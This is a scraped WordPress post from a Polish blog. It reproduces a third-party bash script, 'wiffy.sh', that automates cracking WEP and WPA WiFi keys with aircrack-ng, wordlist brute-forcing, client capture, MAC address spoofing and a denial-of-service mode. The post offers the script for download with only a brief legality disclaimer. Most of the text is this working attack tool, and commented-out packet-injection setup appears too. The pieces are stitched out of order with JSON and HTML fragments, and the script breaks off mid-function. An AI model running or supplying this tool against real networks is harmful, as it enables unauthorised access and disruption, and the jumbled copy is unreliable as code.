\"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0008.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" 